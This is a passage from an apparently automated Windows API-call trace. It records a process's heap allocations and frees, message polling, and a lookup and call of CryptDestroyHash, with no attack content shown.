hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0211.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0211.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0211.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0211.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0211.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0211.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0211.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0211.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0211.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0211.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0211.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0211.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0211.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0211.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.997] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0211.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0211.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0211.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0211.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0211.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.000] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0212.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.000] CryptDestroyHash (hHash=0xa87490) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0212.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0212.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0212.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0212.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0212.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree 